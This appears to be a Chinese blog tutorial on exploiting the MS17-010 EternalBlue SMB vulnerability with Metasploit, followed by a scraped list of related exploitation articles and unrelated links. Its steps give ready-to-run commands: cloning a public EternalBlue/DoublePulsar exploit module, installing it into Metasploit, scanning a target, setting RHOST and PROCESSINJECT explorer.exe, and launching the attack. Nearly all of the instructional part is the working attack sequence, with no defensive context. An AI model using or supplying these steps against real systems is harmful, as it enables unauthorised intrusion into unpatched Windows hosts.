1、升级kali-rolling
a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源“deb http://http.kali.org/kali kali-rolling main non-free contrib”将其他更新源注释掉;

b、更新 apt-get update && apt-get upgrade

2、安装wine32
root@kali:~ wine #提示未安装wine
dpkg --add-architecture i386
apt-get install wine32 && wine update
安装完成后会产生/root/.wine目录。
3、下载扫描模块(smb_ms17_010.rb)和攻击模块(Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb)
扫描模块:
git clone https://github.com/SwordWizard/metasploit-framework/tree/master/modules/auxiliary/scanner/smb/smb_ms17_010
攻击模块:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
将攻击模块解压,并将deps文件夹和eternalblue_doublepulsar.rb拷贝至/root/.msf/modules/exploits/windows/smb中;将扫描模块smb_ms17_010.rb拷贝至/root/.msf/modules/auxiliary/scanner/smb/中。
4、打开msf
msfconsole
msfupdate
5、加载扫描模块并设置
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS XXX.XXX.XXX.XXX
run
6、加载攻击模块
use exploits/windows/smb/eternalblue_doublepulsar
set RHOST XXX.XXX.XXX.XXX
set PROCESSINJECT explorer.exe
run

永恒之蓝(EternalBlue)漏洞利用实例相关推荐

  1. 永恒之蓝EternalBlue漏洞复现

    永恒之蓝EternalBlue漏洞复现 1.背景 永恒之蓝(EternalBlue)是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&quo ...

  2. 永恒之蓝ms17-010漏洞利用复现

    一.永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  3. MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

    MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝 ...

  4. metasploit实战-ms17-010(永恒之蓝)漏洞利用与复现

    本文目录 永恒之蓝概述 实验环境 实验过程 第一步:扫描漏洞 第二步:渗透攻击 第三步:漏洞利用 截屏 永恒之蓝概述 ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2 ...

  5. 永恒之蓝ms17_010漏洞利用攻击

    文章目录 前言 一:基础知识介绍 二.实验环境 三.实验步骤 总结 前言 学习Metasploit的时候就听说了经典的永恒之蓝漏洞,所以自己试验了一次,借此作个记录. 一:基础知识介绍 1.何为永恒之 ...

  6. 永恒之蓝MS17-010漏洞利用 writeup

    MS17-010漏洞: MS17-010漏洞: • 一. MS17-010漏洞公告及相关分析报告 •二.漏洞重现 •漏洞利用防范 • 一. MS17-010漏洞公告及相关分析报告 ★MS17_010 ...

  7. ms17-010(永恒之蓝)漏洞利用

    kali利用ms17-010获取win7权限 环境介绍 利用过程 总结 环境介绍 攻击机:kali(ip:192.168.133.136) 靶机:win7(ip:192.168.133.138) 靶机 ...

  8. python调用msfconsole全自动永恒之蓝攻击_永恒之蓝-ETERNALBLUE漏洞MS17-010利用过程

    本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 事情起因 虽然距离上一次WannaCry席卷全球(17-05-12)已经过去一年多了,现在来复现有炒冷饭的嫌疑,但是还是有价值的 ...

  9. kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

    kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...

最新文章

  1. 奥比中光Orbbec Astra Pro体感摄像头“标定全过程”
  2. Python代码运行不够流畅?看大神如何多角度优化!
  3. python讲解from ctypes import *调用C语言动态链接库
  4. 获取设备IMEI ,手机名称,系统SDK版本号,系统版本号
  5. 蓝凌ekp开发_新华教育集团战略升级,携手蓝凌量身定制数字化办公平台
  6. Morphling:云原生部署 AI , 如何把降本做到极致?
  7. NavigationBar 渐隐效果
  8. 不知道工作组名称怎样加入_剩米饭不知道怎样做?试试泡菜炒饭,再也不用担心米饭做多了...
  9. 信安教程第二版-第19章操作系统安全保护
  10. hdu 1003 Max Sum (DP)
  11. 字符设备驱动(四)按键中断
  12. 【知了堂学习笔记】java 自定义异常
  13. 软件工程需求分析方法
  14. root 红米note5_小米红米Note 5(不要降级刷低版本)手机完美获取root教程,最强root工具,亲测可用!...
  15. 如何在MAC上查看系统运行信息、内存使用率等
  16. Win10桌面图标箭头去掉的方法总结
  17. 从中国近20年的发展历程看今年的就业困难
  18. 制作系统光盘Server 2003 总结
  19. android8.1 修改默认时区为中国
  20. Windows系统kratos生成proto代码是报exec: “protoc“: executable file not found in %PATH%错误解决办法

热门文章

  1. python快递分拣小程
  2. android xx.xml includes views not allowed in a RemoteView自定义通知布局
  3. 在Linux环境以命令行方式部署DM8(达梦8)单机版
  4. 近年CVPR和ICCV论文下载
  5. 零Javascript实现一个简单的相册
  6. 陈天奇团队新研究:自动优化深度学习工作负载
  7. 谷歌以及所有浏览器被篡改hao123
  8. tftp服务器传送文件,3.64 tftp(传输文件)
  9. Win10+HP Officejet Pro 6830 安装打印机
  10. java close wait过多_我是如何确认线上CLOSE_WAIT产生的原因及如何解决的。